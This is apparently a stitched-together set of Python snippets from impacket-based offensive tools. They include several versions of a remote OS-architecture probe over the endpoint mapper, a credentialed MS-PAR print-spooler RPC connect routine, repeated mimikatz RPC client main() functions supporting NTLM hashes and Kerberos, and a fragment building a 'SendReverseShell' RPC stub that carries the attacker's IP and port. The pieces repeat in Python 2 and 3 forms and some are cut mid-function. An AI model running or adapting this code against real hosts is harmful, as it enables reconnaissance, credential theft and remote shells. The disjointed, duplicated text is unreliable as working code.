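def run(self):
    """Probe each target's endpoint mapper on TCP/135 and print its architecture.

    Targets come either from the ``targets`` file option (one host per
    line) or from the single ``target`` option. For every host the
    endpoint-mapper interface is bound with the NDR64 transfer syntax: a
    ``syntaxes_not_supported`` fault means NDR64 is absent (reported as
    32-bit), a successful bind is reported as 64-bit. Per-host failures
    are logged and never abort the loop, so one unreachable host does not
    stop the rest.
    """
    if self.__options.targets is not None:
        for line in self.__options.targets.readlines():
            machine = line.strip(' \r\n')
            # A blank line would otherwise turn into the bogus binding
            # 'ncacn_ip_tcp:[135]' and be reported as a connection error.
            if machine:
                self.__machinesList.append(machine)
    else:
        self.__machinesList.append(self.__options.target)

    logging.info('Gathering OS architecture for %d machines' % len(self.__machinesList))
    logging.info('Socket connect timeout set to %s secs' % self.__options.timeout)

    for machine in self.__machinesList:
        try:
            stringBinding = r'ncacn_ip_tcp:%s[135]' % machine
            transport = DCERPCTransportFactory(stringBinding)
            # int() raises ValueError on a non-numeric timeout; that is
            # caught by the per-machine handler below like any other error.
            transport.set_connect_timeout(int(self.__options.timeout))
            dce = transport.get_dce_rpc()
            dce.connect()
            try:
                dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=self.NDR64Syntax)
            except DCERPCException as e:
                if str(e).find('syntaxes_not_supported') >= 0:
                    print('%s is 32-bit' % machine)
                else:
                    logging.error(str(e))
            else:
                print('%s is 64-bit' % machine)
            finally:
                # Release the socket on every path, including a bind()
                # failure that is not a DCERPCException. Cleanup is
                # best-effort: a failed disconnect must not mask a
                # verdict that was already printed.
                try:
                    dce.disconnect()
                except Exception:
                    pass
        except Exception as e:
            logging.error('%s: %s' % (machine, str(e)))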
def run(self): if self.__options.targets is not None: for line in self.__options.targets.readlines(): self.__machinesList.append(line.strip(' \r\n')) else: self.__machinesList.append(self.__options.target) logging.info('Gathering OS architecture for %d machines' % len(self.__machinesList)) logging.info('Socket connect timeout set to %s secs' % self.__options.timeout) for machine in self.__machinesList: try: stringBinding = r'ncacn_ip_tcp:%s[135]' % machine transport = DCERPCTransportFactory(stringBinding) transport.set_connect_timeout(int(self.__options.timeout)) dce = transport.get_dce_rpc() dce.connect() try: dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=self.NDR64Syntax) except DCERPCException, e: if str(e).find('syntaxes_not_supported') >= 0: print '%s is 32-bit' % machine else: logging.error(str(e)) pass else: print '%s is 64-bit' % machine dce.disconnect()
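def get_arch(self):
    """Return the architecture of ``self.target`` as 32 or 64.

    Binds the endpoint mapper on TCP/135 with the NDR64 transfer syntax.
    A ``syntaxes_not_supported`` fault means NDR64 is absent (32-bit); a
    successful bind means 64-bit. Any other failure (unreachable host,
    unexpected RPC fault) is printed and 32 is returned so the caller can
    still proceed with the 32-bit procdump; the function never returns
    ``None``.
    """
    NDR64Syntax = ("71710533-BEBA-4937-8319-B5DBEF9CCC36", "1.0")
    try:
        stringBinding = r"ncacn_ip_tcp:%s[135]" % self.target
        transport = DCERPCTransportFactory(stringBinding)
        transport.set_connect_timeout(2)
        dce = transport.get_dce_rpc()
        dce.connect()
        try:
            dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=NDR64Syntax)
        except DCERPCException as e:
            if str(e).find("syntaxes_not_supported") >= 0:
                return 32
            # Some other RPC fault: report it and use the fallback below
            # instead of silently returning None.
            print(str(e))
        else:
            return 64
        finally:
            # The socket was previously leaked on both return paths.
            # Cleanup is best-effort so a failed disconnect cannot
            # overturn a verdict that is already being returned.
            try:
                dce.disconnect()
            except Exception:
                pass
    except Exception as e:
        print(f"{self.target}, {str(e)}")
    print(f"Failed to determine {self.target} architecture")
    print("Attempt to proceed with 32 bit procdump")
    return 32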
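def DCE(transport, timeout=2):
    """Connect a DCE/RPC transport and return the connected ``dce`` object.

    ``transport`` is a string binding such as ``ncacn_ip_tcp:host[135]``;
    ``timeout`` is the socket connect timeout in seconds and is coerced
    with ``int``. On any failure the error is printed together with the
    binding and ``None`` is returned, so callers must check the result
    before calling ``bind`` on it.
    """
    try:
        t = DCERPCTransportFactory(transport)
        t.set_connect_timeout(int(timeout))
        d = t.get_dce_rpc()
        d.connect()
        return d
    except Exception as e:
        # 'except Exception as e' is accepted by Python 2.6+ and 3; the
        # old 'except Exception, e' form is a syntax error on Python 3.
        print('%s: %s' % (transport, str(e)))
        return None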
def connect(username, password, domain, lmhash, nthash, address, port):
    """Open an authenticated, packet-privacy DCE/RPC binding to the MS-PAR interface.

    The endpoint is resolved through the endpoint mapper on ``address``
    over ``ncacn_ip_tcp``; the supplied credentials (plaintext password
    and/or LM/NT hashes) are attached to the transport and the
    connection is bound at ``RPC_C_AUTHN_LEVEL_PKT_PRIVACY``. ``port`` is
    accepted for interface compatibility but is not used here: the port
    comes from the endpoint-mapper lookup. Returns the bound ``dce``
    object.
    """
    binding = epm.hept_map(address, par.MSRPC_UUID_PAR, protocol='ncacn_ip_tcp')
    rpctransport = DCERPCTransportFactory(binding)
    rpctransport.set_credentials(username, password, domain, lmhash, nthash)

    rpc = rpctransport.get_dce_rpc()
    # Packet privacy: every RPC PDU is encrypted and integrity-protected.
    rpc.set_auth_level(rpcrt.RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
    rpc.connect()

    # Transfer syntax is pinned explicitly rather than left to the default.
    transfer = ('8A885D04-1CEB-11C9-9FE8-08002B104860', '2.0')
    rpc.bind(par.MSRPC_UUID_PAR, transfer_syntax=transfer)
    return rpc
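def get_os_arch(self):
    """Return the OS architecture of ``self.host``: 32, 64, or 0 when unknown.

    Binds the endpoint mapper on TCP/135 requesting the NDR64 transfer
    syntax: a ``syntaxes_not_supported`` fault means the host has no
    NDR64 (32-bit), a successful bind means 64-bit. Any other error is
    logged at debug level and 0 is returned; the function never returns
    ``None``.
    """
    try:
        stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
        transport = DCERPCTransportFactory(stringBinding)
        transport.set_connect_timeout(5)
        dce = transport.get_dce_rpc()
        dce.connect()
        try:
            dce.bind(
                MSRPC_UUID_PORTMAP,
                transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
        except DCERPCException as e:
            # The previous 'except (DCERPCException, e)' evaluated the
            # undefined name e, so every 32-bit host raised NameError and
            # was reported as 0.
            if str(e).find('syntaxes_not_supported') >= 0:
                return 32
            # Any other RPC fault: the architecture is unknown.
            logging.debug('Error retrieving os arch of {}: {}'.format(
                self.host, str(e)))
            return 0
        else:
            return 64
        finally:
            # Release the socket on every path. Best-effort: a failed
            # disconnect must not overturn the verdict being returned.
            try:
                dce.disconnect()
            except Exception:
                pass
    except Exception as e:
        logging.debug('Error retrieving os arch of {}: {}'.format(
            self.host, str(e)))
        return 0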
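def get_os_arch(self):
    # Credit: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
    # Credit: https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_19/examples/getArch.py
    """Return the OS architecture of ``self.host``: 32, 64, or 0 when unknown.

    Binds the endpoint mapper on TCP/135 requesting the NDR64 transfer
    syntax: a ``syntaxes_not_supported`` fault means the host has no
    NDR64 (32-bit), a successful bind means 64-bit. Any other failure
    yields 0; the function never returns ``None``.
    """
    try:
        stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
        transport = DCERPCTransportFactory(stringBinding)
        transport.set_connect_timeout(5)
        dce = transport.get_dce_rpc()
        dce.connect()
        try:
            dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
        except DCERPCException as e:
            if str(e).find('syntaxes_not_supported') >= 0:
                return 32
            # Any other RPC fault: unknown architecture (previously this
            # path fell off the end and returned None).
            return 0
        else:
            return 64
        finally:
            # Release the socket on every path. Best-effort: a failed
            # disconnect must not overturn the verdict being returned.
            try:
                dce.disconnect()
            except Exception:
                pass
    except Exception:
        # Narrowed from a bare 'except:' so KeyboardInterrupt/SystemExit
        # still propagate to the caller.
        return 0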
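def get_os_arch(target):
    """Return the OS architecture of ``target``: 32, 64, or ``None`` when unknown.

    Binds the endpoint mapper on TCP/135 requesting the NDR64 transfer
    syntax: a ``syntaxes_not_supported`` fault means the host has no
    NDR64 (32-bit), a successful bind means 64-bit. Connection errors and
    unexpected RPC faults are logged as warnings and ``None`` is returned.
    """
    try:
        stringBinding = r'ncacn_ip_tcp:{}[135]'.format(target)
        transport = DCERPCTransportFactory(stringBinding)
        transport.set_connect_timeout(5)
        dce = transport.get_dce_rpc()
        dce.connect()
        try:
            dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
        except DCERPCException as e:
            if str(e).find('syntaxes_not_supported') >= 0:
                return 32
            # Previously swallowed with 'pass'; surface it so an unknown
            # result is explainable in the log.
            logging.warning('%sErr with get_os_arch for %s: %s' % (warningRed, target, str(e)))
            return None
        else:
            return 64
        finally:
            # The original only disconnected on the fall-through path and
            # leaked the socket on both verdict returns. Best-effort: a
            # failed disconnect must not overturn the verdict.
            try:
                dce.disconnect()
            except Exception:
                pass
    except Exception as e:
        logging.warning('%sErr with get_os_arch for %s: %s' % (warningRed, target, str(e)))
        return None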
def main(): # Init the example's logger theme logger.init() print(version.BANNER) parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.") parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>') parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell') parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)') group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file ' '(KRB5CCNAME) based on target parameters. If valid credentials ' 'cannot be found, it will use the ones specified in the command ' 'line') group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication ' '(128 or 256 bits)') group = parser.add_argument_group('connection') group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in ' 'the target parameter') group.add_argument('-target-ip', action='store', metavar="ip address", help='IP Address of the target machine. If omitted it will use whatever was specified as target. 
' 'This is useful when target is the NetBIOS name and you cannot resolve it') if len(sys.argv)==1: parser.print_help() sys.exit(1) options = parser.parse_args() if options.debug is True: logging.getLogger().setLevel(logging.DEBUG) # Print the Library's installation path logging.debug(version.getInstallationPath()) else: logging.getLogger().setLevel(logging.INFO) domain, username, password, address = parse_target(options.target) if options.target_ip is None: options.target_ip = address if domain is None: domain = '' if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None: from getpass import getpass password = getpass("Password:"******"Executing commands from %s" % options.file.name) for line in options.file.readlines(): if line[0] != '#': print("# %s" % line, end=' ') shell.onecmd(line) else: print(line, end=' ') else: shell.cmdloop() except Exception as e: logging.debug("Exception:", exc_info=True) logging.error(str(e))
def main(): # Init the example's logger theme logger.init() print version.BANNER parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.") parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>') parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell') parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)') group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file ' '(KRB5CCNAME) based on target parameters. If valid credentials ' 'cannot be found, it will use the ones specified in the command ' 'line') group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication ' '(128 or 256 bits)') group = parser.add_argument_group('connection') group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in ' 'the target parameter') group.add_argument('-target-ip', action='store', metavar="ip address", help='IP Address of the target machine. If ommited it will use whatever was specified as target. 
' 'This is useful when target is the NetBIOS name and you cannot resolve it') group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port", help='Destination port to connect to SMB Server') if len(sys.argv)==1: parser.print_help() sys.exit(1) options = parser.parse_args() if options.debug is True: logging.getLogger().setLevel(logging.DEBUG) else: logging.getLogger().setLevel(logging.INFO) import re domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match( options.target).groups('') #In case the password contains '@' if '@' in address: password = password + '@' + address.rpartition('@')[0] address = address.rpartition('@')[2] if options.target_ip is None: options.target_ip = address if domain is None: domain = '' if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None: from getpass import getpass password = getpass("Password:"******"Executing commands from %s" % options.file.name) for line in options.file.readlines(): if line[0] != '#': print "# %s" % line, shell.onecmd(line) else: print line, else: shell.cmdloop() except Exception, e: #import traceback #print traceback.print_exc() logging.error(str(e))
except Exception, e: if str(e).find('ept_s_not_registered') >= 0: # Let's try ncacn_ip_tcp stringBinding = epm.hept_map(address, mimilib.MSRPC_UUID_MIMIKATZ, protocol='ncacn_ip_tcp') else: raise else: stringBinding = epm.hept_map(address, mimilib.MSRPC_UUID_MIMIKATZ, protocol='ncacn_ip_tcp') if bound is False: rpctransport = DCERPCTransportFactory(stringBinding) rpctransport.set_credentials(username, password, domain, lmhash, nthash, options.aesKey) dce = rpctransport.get_dce_rpc() if options.k is True: rpctransport.set_kerberos(True, options.dc_ip) dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE) rpctransport.set_credentials(username, password, domain, lmhash, nthash) dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) dce.connect() dce.bind(mimilib.MSRPC_UUID_MIMIKATZ) shell = MimikatzShell(dce) if options.file is not None:
def main(): # Init the example's logger theme logger.init() print(version.BANNER) parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.") parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>') parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell') parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)') group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file ' '(KRB5CCNAME) based on target parameters. If valid credentials ' 'cannot be found, it will use the ones specified in the command ' 'line') group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication ' '(128 or 256 bits)') group = parser.add_argument_group('connection') group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in ' 'the target parameter') group.add_argument('-target-ip', action='store', metavar="ip address", help='IP Address of the target machine. If omitted it will use whatever was specified as target. 
' 'This is useful when target is the NetBIOS name and you cannot resolve it') if len(sys.argv)==1: parser.print_help() sys.exit(1) options = parser.parse_args() if options.debug is True: logging.getLogger().setLevel(logging.DEBUG) else: logging.getLogger().setLevel(logging.INFO) import re domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match( options.target).groups('') #In case the password contains '@' if '@' in address: password = password + '@' + address.rpartition('@')[0] address = address.rpartition('@')[2] if options.target_ip is None: options.target_ip = address if domain is None: domain = '' if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None: from getpass import getpass password = getpass("Password:"******"Executing commands from %s" % options.file.name) for line in options.file.readlines(): if line[0] != '#': print("# %s" % line, end=' ') shell.onecmd(line) else: print(line, end=' ') else: shell.cmdloop() except Exception as e: logging.debug("Exception:", exc_info=True) logging.error(str(e))
format_ip = f"<{len(lip) + 1}s" structure = ( # Yeah f**k this x) ('unknown', '<12s'), # <(Size of ip address + \x00)s ('ip_address', format_ip), # <5 - (Size of len(port)xh ('port', "<xxxi") ) # Create the string binding stringBinding = r'ncacn_ip_tcp:{}[{}]'.format(target_ip, port) # Connect to the remote endpoint transport = DCERPCTransportFactory(stringBinding) dce = transport.get_dce_rpc() dce.connect() print("[*] Connected to the remote target") # Casts the UUID string and version of the interface into a UUID object interface_uuid = uuidtup_to_bin(("AB4ED934-1293-10DE-BC12-AE18C48DEF33", "1.0")) # Binds to the interface dce.bind(interface_uuid) print("[*] Binded to AB4ED934-1293-10DE-BC12-AE18C48DEF33") print("[*] Formatting the client stub") # Create the client stub and pack its data so it valid query = SendReverseShell() query['unknown'] = '\x0d\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00' query['ip_address'] = f"{lip}\x00"
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) dce.connect() dce.bind(mimilib.MSRPC_UUID_MIMIKATZ) bound = True except Exception, e: if str(e).find('ept_s_not_registered') >=0: # Let's try ncacn_ip_tcp stringBinding = epm.hept_map(address, mimilib.MSRPC_UUID_MIMIKATZ, protocol = 'ncacn_ip_tcp') else: raise else: stringBinding = epm.hept_map(address, mimilib.MSRPC_UUID_MIMIKATZ, protocol = 'ncacn_ip_tcp') if bound is False: rpctransport = DCERPCTransportFactory(stringBinding) rpctransport.set_credentials(username, password, domain, lmhash, nthash, options.aesKey) dce = rpctransport.get_dce_rpc() if options.k is True: rpctransport.set_kerberos(True, options.dc_ip) dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE) rpctransport.set_credentials(username, password, domain, lmhash, nthash) dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) dce.connect() dce.bind(mimilib.MSRPC_UUID_MIMIKATZ) shell = MimikatzShell(dce) if options.file is not None: logging.info("Executing commands from %s" % options.file.name) for line in options.file.readlines():